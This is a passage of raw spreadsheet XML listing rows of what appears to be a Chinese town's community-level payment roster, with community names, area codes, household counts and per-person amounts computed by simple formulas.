    <row r="750" customHeight="1" spans="1:11">
      <c r="A750" s="16" t="s">
        <v>2023</v>
      </c>
      <c r="B750" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C750" s="17" t="s">
        <v>2024</v>
      </c>
      <c r="D750" s="17" t="s">
        <v>2025</v>
      </c>
      <c r="E750" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F750" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G750" s="17">
        <v>1</v>
      </c>
      <c r="H750" s="18">
        <v>365</v>
      </c>
      <c r="I750" s="17">
        <f t="shared" si="32"/>
        <v>365</v>
      </c>
      <c r="J750" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K750" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="751" customHeight="1" spans="1:11">
      <c r="A751" s="16" t="s">
        <v>2026</v>
      </c>
      <c r="B751" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C751" s="17" t="s">
        <v>2024</v>
      </c>
      <c r="D751" s="17" t="s">
        <v>2027</v>
      </c>
      <c r="E751" s="17" t="s">
        <v>242</v>
      </c>
      <c r="F751" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G751" s="17">
        <v>2</v>
      </c>
      <c r="H751" s="18">
        <v>325</v>
      </c>
      <c r="I751" s="17">
        <f t="shared" si="32"/>
        <v>650</v>
      </c>
      <c r="J751" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K751" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="752" customHeight="1" spans="1:11">
      <c r="A752" s="16" t="s">
        <v>2028</v>
      </c>
      <c r="B752" s="17" t="str">
        <f>B751</f>
        <v>城关镇</v>
      </c>
      <c r="C752" s="17" t="str">
        <f>C751</f>
        <v>城关镇中华社区</v>
      </c>
      <c r="D752" s="28" t="s">
        <v>2029</v>
      </c>
      <c r="E752" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F752" s="17" t="str">
        <f>F751</f>
        <v>4113210108</v>
      </c>
      <c r="G752" s="17"/>
      <c r="H752" s="17"/>
      <c r="I752" s="17"/>
      <c r="J752" s="17"/>
      <c r="K752" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="753" customHeight="1" spans="1:11">
      <c r="A753" s="16" t="s">
        <v>2030</v>
      </c>
      <c r="B753" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C753" s="17" t="s">
        <v>2031</v>
      </c>
      <c r="D753" s="17" t="s">
        <v>2032</v>
      </c>
      <c r="E753" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F753" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G753" s="17">
        <v>1</v>
      </c>
      <c r="H753" s="18">
        <v>365</v>
      </c>
      <c r="I753" s="17">
        <f t="shared" ref="I753:I759" si="33">H753*G753</f>
        <v>365</v>
      </c>
      <c r="J753" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K753" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="754" customHeight="1" spans="1:11">
      <c r="A754" s="16" t="s">
        <v>2033</v>
      </c>
      <c r="B754" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C754" s="17" t="s">
        <v>2034</v>
      </c>
      <c r="D754" s="17" t="s">
        <v>2035</v>
      </c>
      <c r="E754" s="17" t="s">
        <v>261</v>
      </c>
      <c r="F754" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G754" s="17">
        <v>1</v>
      </c>
      <c r="H754" s="18">
        <v>365</v>
      </c>
      <c r="I754" s="17">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J754" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K754" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="755" customHeight="1" spans="1:11">
      <c r="A755" s="16" t="s">
        <v>2036</v>
      </c>
      <c r="B755" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C755" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D755" s="17" t="s">
        <v>2038</v>
      </c>
      <c r="E755" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F755" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G755" s="17">
        <v>1</v>
      </c>
      <c r="H755" s="18">
        <v>365</v>
      </c>
      <c r="I755" s="17">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J755" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K755" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="756" customHeight="1" spans="1:11">
      <c r="A756" s="16" t="s">
        <v>2039</v>
      </c>
      <c r="B756" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C756" s="17" t="s">
        <v>2040</v>
      </c>
      <c r="D756" s="17" t="s">
        <v>2041</v>
      </c>
      <c r="E756" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F756" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G756" s="17">
        <v>1</v>
      </c>
      <c r="H756" s="18">
        <v>365</v>
      </c>
      <c r="I756" s="17">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J756" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K756" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="757" customHeight="1" spans="1:11">
      <c r="A757" s="16" t="s">
        <v>2042</v>
      </c>
      <c r="B757" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C757" s="17" t="s">
        <v>2040</v>
      </c>
      <c r="D757" s="17" t="s">
        <v>2043</v>
      </c>
      <c r="E757" s="17" t="s">
        <v>397</v>
      </c>
      <c r="F757" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G757" s="17">
        <v>1</v>
      </c>
      <c r="H757" s="18">
        <v>365</v>
      </c>
      <c r="I757" s="17">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J757" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K757" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="758" customHeight="1" spans="1:11">
      <c r="A758" s="16" t="s">
        <v>2044</v>
      </c>
      <c r="B758" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C758" s="17" t="s">
        <v>2045</v>
      </c>
      <c r="D758" s="17" t="s">
        <v>2046</v>
      </c>
      <c r="E758" s="17" t="s">
        <v>1077</v>
      </c>
      <c r="F758" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G758" s="17">
        <v>1</v>
      </c>
      <c r="H758" s="18">
        <v>365</v>
      </c>
      <c r="I758" s="17">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J758" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K758" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="759" customHeight="1" spans="1:11">
      <c r="A759" s="16" t="s">
        <v>2047</v>
      </c>
      <c r="B759" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C759" s="17" t="s">
        <v>2045</v>
      </c>
      <c r="D759" s="17" t="s">
        <v>2048</v>
      </c>
      <c r="E759" s="17" t="s">
        <v>252</v>
      </c>
      <c r="F759" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G759" s="17">
        <v>2</v>
      </c>
      <c r="H759" s="18">
        <v>325</v>
      </c>
      <c r="I759" s="17">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J759" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K759" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="760" customHeight="1" spans="1:11">
      <c r="A760" s="16" t="s">
        <v>2049</v>
      </c>
      <c r="B760" s="17" t="str">
        <f>B759</f>
        <v>城关镇</v>
      </c>
      <c r="C760" s="17" t="str">
        <f>C759</f>
        <v>北外社区</v>
      </c>
      <c r="D760" s="28" t="s">
        <v>2050</v>
      </c>
      <c r="E760" s="24" t="s">
        <v>1775</v>
      </c>
      <c r="F760" s="17" t="str">
        <f>F759</f>
        <v>4113210102</v>
      </c>
      <c r="G760" s="17"/>
      <c r="H760" s="17"/>
      <c r="I760" s="17"/>
      <c r="J760" s="17"/>
      <c r="K760" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="761" customHeight="1" spans="1:11">
      <c r="A761" s="16" t="s">
        <v>2051</v>
      </c>
      <c r="B761" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C761" s="17" t="s">
        <v>1846</v>
      </c>
      <c r="D761" s="17" t="s">
        <v>2052</v>
      </c>
      <c r="E761" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F761" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G761" s="17">
        <v>1</v>
      </c>
      <c r="H761" s="18">
        <v>365</v>
      </c>
      <c r="I761" s="17">
        <f>H761*G761</f>
        <v>365</v>
      </c>
      <c r="J761" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K761" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="762" customHeight="1" spans="1:11">
      <c r="A762" s="16" t="s">
        <v>2053</v>
      </c>
      <c r="B762" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C762" s="17" t="s">
        <v>1688</v>
      </c>
      <c r="D762" s="17" t="s">
        <v>2054</v>
      </c>
      <c r="E762" s="17" t="s">
        <v>2055</v>
      </c>
      <c r="F762" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G762" s="17">
        <v>1</v>
      </c>
      <c r="H762" s="18">
        <v>365</v>
      </c>
      <c r="I762" s="17">
        <f>H762*G762</f>
        <v>365</v>
      </c>
      <c r="J762" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K762" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="763" customHeight="1" spans="1:11">
      <c r="A763" s="16" t="s">
        <v>2056</v>
      </c>
      <c r="B763" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C763" s="17" t="s">
        <v>2057</v>
      </c>
      <c r="D763" s="17" t="s">
        <v>2058</v>
      </c>
      <c r="E763" s="17" t="s">
        <v>2059</v>
      </c>
      <c r="F763" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G763" s="17">
        <v>2</v>
      </c>
      <c r="H763" s="18">
        <v>325</v>
      </c>
      <c r="I763" s="17">
        <f>H763*G763</f>
        <v>650</v>
      </c>
      <c r="J763" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K763" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="764" customHeight="1" spans="1:11">
      <c r="A764" s="16" t="s">
        <v>2060</v>
      </c>
      <c r="B764" s="17" t="str">
        <f>B763</f>
        <v>城关镇</v>
      </c>
      <c r="C764" s="17" t="str">
        <f>C763</f>
        <v>西北社区</v>
      </c>
      <c r="D764" s="23" t="s">
        <v>2061</v>
      </c>
      <c r="E764" s="23" t="s">
        <v>2062</v>
      </c>
      <c r="F764" s="17" t="str">
        <f>F763</f>
        <v>4113210106</v>
      </c>
      <c r="G764" s="17"/>
      <c r="H764" s="17"/>
      <c r="I764" s="17"/>
      <c r="J764" s="17"/>
      <c r="K764" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="765" customHeight="1" spans="1:11">
      <c r="A765" s="16" t="s">
        <v>2063</v>
      </c>
      <c r="B765" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C765" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D765" s="17" t="s">
        <v>2064</v>
      </c>
      <c r="E765" s="17" t="s">
        <v>303</v>
      </c>
      <c r="F765" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G765" s="17">
        <v>1</v>
      </c>
      <c r="H765" s="18">
        <v>365</v>
      </c>
      <c r="I765" s="17">
        <f t="shared" ref="I765:I771" si="34">H765*G765</f>
        <v>365</v>
      </c>
      <c r="J765" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K765" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="766" customHeight="1" spans="1:11">
      <c r="A766" s="16" t="s">
        <v>2065</v>
      </c>
      <c r="B766" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C766" s="17" t="s">
        <v>247</v>
      </c>
      <c r="D766" s="17" t="s">
        <v>2066</v>
      </c>
      <c r="E766" s="17" t="s">
        <v>1871</v>
      </c>
      <c r="F766" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G766" s="17">
        <v>1</v>
      </c>
      <c r="H766" s="18">
        <v>365</v>
      </c>
      <c r="I766" s="17">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J766" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K766" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="767" customHeight="1" spans="1:11">
      <c r="A767" s="16" t="s">
        <v>2067</v>
      </c>
      <c r="B767" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C767" s="17" t="s">
        <v>1783</v>
      </c>
      <c r="D767" s="17" t="s">
        <v>2068</v>
      </c>
      <c r="E767" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F767" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G767" s="17">
        <v>1</v>
      </c>
      <c r="H767" s="18">
        <v>365</v>
      </c>
      <c r="I767" s="17">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J767" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K767" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="768" customHeight="1" spans="1:11">
      <c r="A768" s="16" t="s">
        <v>2069</v>
      </c>
      <c r="B768" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C768" s="17" t="s">
        <v>2057</v>
      </c>
      <c r="D768" s="17" t="s">
        <v>2070</v>
      </c>
      <c r="E768" s="17" t="s">
        <v>346</v>
      </c>
      <c r="F768" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G768" s="17">
        <v>1</v>
      </c>
      <c r="H768" s="18">
        <v>365</v>
      </c>
      <c r="I768" s="17">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J768" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K768" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="769" customHeight="1" spans="1:11">
      <c r="A769" s="16" t="s">
        <v>2071</v>
      </c>
      <c r="B769" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C769" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D769" s="17" t="s">
        <v>2072</v>
      </c>
      <c r="E769" s="17" t="s">
        <v>2073</v>
      </c>
      <c r="F769" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G769" s="17">
        <v>1</v>
      </c>
      <c r="H769" s="18">
        <v>365</v>
      </c>
      <c r="I769" s="17">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J769" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K769" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="770" customHeight="1" spans="1:11">
      <c r="A770" s="16" t="s">
        <v>2074</v>
      </c>
      <c r="B770" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C770" s="17" t="s">
        <v>1783</v>
      </c>
      <c r="D770" s="17" t="s">
        <v>2075</v>
      </c>
      <c r="E770" s="17" t="s">
        <v>2076</v>
      </c>
      <c r="F770" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G770" s="17">
        <v>1</v>
      </c>
      <c r="H770" s="18">
        <v>365</v>
      </c>
      <c r="I770" s="17">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J770" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K770" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="771" customHeight="1" spans="1:11">
      <c r="A771" s="16" t="s">
        <v>2077</v>
      </c>
      <c r="B771" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C771" s="17" t="s">
        <v>2057</v>
      </c>
      <c r="D771" s="17" t="s">
        <v>2078</v>
      </c>
      <c r="E771" s="17" t="s">
        <v>923</v>
      </c>
      <c r="F771" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G771" s="17">
        <v>2</v>
      </c>
      <c r="H771" s="18">
        <v>325</v>
      </c>
      <c r="I771" s="17">
        <f t="shared" si="34"/>
        <v>650</v>
      </c>
      <c r="J771" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K771" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="772" customHeight="1" spans="1:11">
      <c r="A772" s="16" t="s">
        <v>2079</v>
      </c>
      <c r="B772" s="17" t="str">
        <f>B771</f>
        <v>城关镇</v>
      </c>
      <c r="C772" s="17" t="str">
        <f>C771</f>
        <v>西北社区</v>
      </c>
      <c r="D772" s="27" t="s">
        <v>2080</v>
      </c>
      <c r="E772" s="27" t="s">
        <v>288</v>
      </c>
      <c r="F772" s="17" t="str">
        <f>F771</f>
        <v>4113210106</v>
      </c>
      <c r="G772" s="17"/>
      <c r="H772" s="17"/>
      <c r="I772" s="17"/>
      <c r="J772" s="17"/>
      <c r="K772" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="773" customHeight="1" spans="1:11">
      <c r="A773" s="16" t="s">
        <v>2081</v>
      </c>
      <c r="B773" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C773" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D773" s="17" t="s">
        <v>2082</v>
      </c>
      <c r="E773" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F773" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G773" s="17">
        <v>1</v>
      </c>
      <c r="H773" s="18">
        <v>365</v>
      </c>
      <c r="I773" s="17">
        <f t="shared" ref="I773:I787" si="35">H773*G773</f>
        <v>365</v>
      </c>
      <c r="J773" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K773" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="774" customHeight="1" spans="1:11">
      <c r="A774" s="16" t="s">
        <v>2083</v>
      </c>
      <c r="B774" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C774" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D774" s="17" t="s">
        <v>2084</v>
      </c>
      <c r="E774" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F774" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G774" s="17">
        <v>1</v>
      </c>
      <c r="H774" s="18">
        <v>365</v>
      </c>
      <c r="I774" s="17">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J774" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K774" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="775" customHeight="1" spans="1:11">
      <c r="A775" s="16" t="s">
        <v>2085</v>
      </c>
      <c r="B775" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C775" s="17" t="s">
        <v>2086</v>
      </c>
      <c r="D775" s="17" t="s">
        <v>2087</v>
      </c>
      <c r="E775" s="17" t="s">
        <v>2088</v>
      </c>
      <c r="F775" s="17" t="s">
        <v>1215</v>
      </c>
      <c r="G775" s="17">
        <v>1</v>
      </c>
      <c r="H775" s="18">
        <v>365</v>
      </c>
      <c r="I775" s="17">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J775" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K775" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="776" customHeight="1" spans="1:11">
      <c r="A776" s="16" t="s">
        <v>2089</v>
      </c>
      <c r="B776" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C776" s="17" t="s">
        <v>2057</v>
      </c>
      <c r="D776" s="17" t="s">
        <v>2090</v>
      </c>
      <c r="E776" s="17" t="s">
        <v>2091</v>
      </c>
      <c r="F776" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G776" s="17">
        <v>1</v>
      </c>
      <c r="H776" s="18">
        <v>365</v>
      </c>
      <c r="I776" s="17">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J776" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K776" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="777" customHeight="1" spans="1:11">
      <c r="A777" s="16" t="s">
        <v>2092</v>
      </c>
      <c r="B777" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C777" s="17" t="s">
        <v>2040</v>
      </c>
      <c r="D777" s="17" t="s">
        <v>2093</v>
      </c>
      <c r="E777" s="17" t="s">
        <v>703</v>
      </c>
      <c r="F777" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G777" s="17">
        <v>1</v>
      </c>
      <c r="H777" s="18">
        <v>365</v>
      </c>
      <c r="I777" s="17">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J777" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K777" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="778" customHeight="1" spans="1:11">
      <c r="A778" s="16" t="s">
        <v>2094</v>
      </c>
      <c r="B778" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C778" s="17" t="s">
        <v>2040</v>
      </c>
      <c r="D778" s="17" t="s">
        <v>2095</v>
      </c>
      <c r="E778" s="17" t="s">
        <v>432</v>
      </c>
      <c r="F778" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G778" s="17">
        <v>1</v>
      </c>
      <c r="H778" s="18">
        <v>365</v>
      </c>
      <c r="I778" s="17">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J778" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K778" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="779" customHeight="1" spans="1:11">
      <c r="A779" s="16" t="s">
        <v>2096</v>
      </c>
      <c r="B779" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C779" s="17" t="s">
        <v>219</v>
      </c>
      <c r="D779" s="17" t="s">
        <v>2097</v>
      </c>
      <c r="E779" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F779" s="17" t="s">
        <v>1215</v>
      </c>
      <c r="G779" s="17">
        <v>1</v>
      </c>
      <c r="H779" s="18">
        <v>365</v>
      </c>
      <c r="I779" s="17">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J779" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K779" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="780" customHeight="1" spans="1:11">
      <c r="A780" s="16" t="s">
        <v>2098</v>
      </c>
      <c r="B780" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C780" s="17" t="s">
        <v>2099</v>
      </c>
      <c r="D780" s="17" t="s">
        <v>2100</v>
      </c>
      <c r="E780" s="17" t="s">
        <v>877</v>
      </c>
      <c r="F780" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G780" s="17">
        <v>1</v>
      </c>
      <c r="H780" s="18">
        <v>365</v>
      </c>
      <c r="I780" s="17">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J780" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K780" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="781" customHeight="1" spans="1:11">
      <c r="A781" s="16" t="s">
        <v>2101</v>
      </c>
      <c r="B781" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C781" s="17" t="s">
        <v>2099</v>
      </c>
      <c r="D781" s="17" t="s">
        <v>2102</v>
      </c>
      <c r="E781" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F781" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G781" s="17">
        <v>1</v>
      </c>
      <c r="H781" s="18">
        <v>365</v>
      </c>
      <c r="I781" s="17">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J781" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K781" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="782" customHeight="1" spans="1:11">
      <c r="A782" s="16" t="s">
        <v>2103</v>
      </c>
      <c r="B782" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C782" s="17" t="s">
        <v>2104</v>
      </c>
      <c r="D782" s="17" t="s">
        <v>2105</v>
      </c>
      <c r="E782" s="17" t="s">
        <v>258</v>
      </c>
      <c r="F782" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G782" s="17">
        <v>1</v>
      </c>
      <c r="H782" s="18">
        <v>365</v>
      </c>
      <c r="I782" s="17">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J782" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K782" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="783" customHeight="1" spans="1:11">
      <c r="A783" s="16" t="s">
        <v>2106</v>
      </c>
      <c r="B783" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C783" s="17" t="s">
        <v>2104</v>
      </c>
      <c r="D783" s="17" t="s">
        <v>2107</v>
      </c>
      <c r="E783" s="17" t="s">
        <v>2108</v>
      </c>
      <c r="F783" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G783" s="17">
        <v>1</v>
      </c>
      <c r="H783" s="18">
        <v>365</v>
      </c>
      <c r="I783" s="17">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J783" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K783" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="784" customHeight="1" spans="1:11">
      <c r="A784" s="16" t="s">
        <v>2109</v>
      </c>
      <c r="B784" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C784" s="17" t="s">
        <v>2104</v>
      </c>
      <c r="D784" s="17" t="s">
        <v>2110</v>
      </c>
      <c r="E784" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F784" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G784" s="17">
        <v>1</v>
      </c>
      <c r="H784" s="18">
        <v>365</v>
      </c>
      <c r="I784" s="17">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J784" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K784" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="785" customHeight="1" spans="1:11">
      <c r="A785" s="16" t="s">
        <v>2111</v>
      </c>
      <c r="B785" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C785" s="17" t="s">
        <v>1544</v>
      </c>
      <c r="D785" s="17" t="s">
        <v>2112</v>
      </c>
      <c r="E785" s="17" t="s">
        <v>2113</v>
      </c>
      <c r="F785" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G785" s="17">
        <v>1</v>
      </c>
      <c r="H785" s="18">
        <v>365</v>
      </c>
      <c r="I785" s="17">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J785" s="17">
        <v>45078</v>
      </c>
      <c r="K785" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="786" customHeight="1" spans="1:11">
      <c r="A786" s="16" t="s">
        <v>2114</v>
      </c>
      <c r="B786" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C786" s="17" t="s">
        <v>2099</v>
      </c>
      <c r="D786" s="17" t="s">
        <v>2115</v>
      </c>
      <c r="E786" s="17" t="s">
        <v>521</v>
      </c>
      <c r="F786" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G786" s="17">
        <v>1</v>
      </c>
      <c r="H786" s="18">
        <v>365</v>
      </c>
      <c r="I786" s="17">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J786" s="17">
        <v>45078</v>
      </c>
      <c r="K786" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="787" customHeight="1" spans="1:11">
      <c r="A787" s="16" t="s">
        <v>2116</v>
      </c>
      <c r="B787" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C787" s="17" t="s">
        <v>2034</v>
      </c>
      <c r="D787" s="17" t="s">
        <v>2117</v>
      </c>
      <c r="E787" s="17" t="s">
        <v>2118</v>
      </c>
      <c r="F787" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G787" s="17">
        <v>2</v>
      </c>
      <c r="H787" s="18">
        <v>325</v>
      </c>
      <c r="I787" s="17">
        <f t="shared" si="35"/>
        <v>650</v>
      </c>
      <c r="J787" s="17">
        <v>45078</v>
      </c>
      <c r="K787" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="788" customHeight="1" spans="1:11">
      <c r="A788" s="16" t="s">
        <v>2119</v>
      </c>
      <c r="B788" s="17" t="str">
        <f>B787</f>
        <v>城关镇</v>
      </c>
      <c r="C788" s="17" t="str">
        <f>C787</f>
        <v>城关镇东北社区</v>
      </c>
      <c r="D788" s="23" t="s">
        <v>2120</v>
      </c>
      <c r="E788" s="23" t="s">
        <v>2121</v>
      </c>
      <c r="F788" s="17" t="str">
        <f>F787</f>
        <v>4113210103</v>
      </c>
      <c r="G788" s="17"/>
      <c r="H788" s="17"/>
      <c r="I788" s="17"/>
      <c r="J788" s="17"/>
      <c r="K788" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="789" customHeight="1" spans="1:11">
      <c r="A789" s="16" t="s">
        <v>2122</v>
      </c>
      <c r="B789" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C789" s="17" t="s">
        <v>2104</v>
      </c>
      <c r="D789" s="17" t="s">
        <v>2123</v>
      </c>
      <c r="E789" s="17" t="s">
        <v>389</v>
      </c>
      <c r="F789" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G789" s="17">
        <v>1</v>
      </c>
      <c r="H789" s="18">
        <v>365</v>
      </c>
      <c r="I789" s="17">
        <f t="shared" ref="I789:I795" si="36">H789*G789</f>
        <v>365</v>
      </c>
      <c r="J789" s="17">
        <v>45078</v>
      </c>
      <c r="K789" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="790" customHeight="1" spans="1:11">
      <c r="A790" s="16" t="s">
        <v>2124</v>
      </c>
      <c r="B790" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C790" s="17" t="s">
        <v>286</v>
      </c>
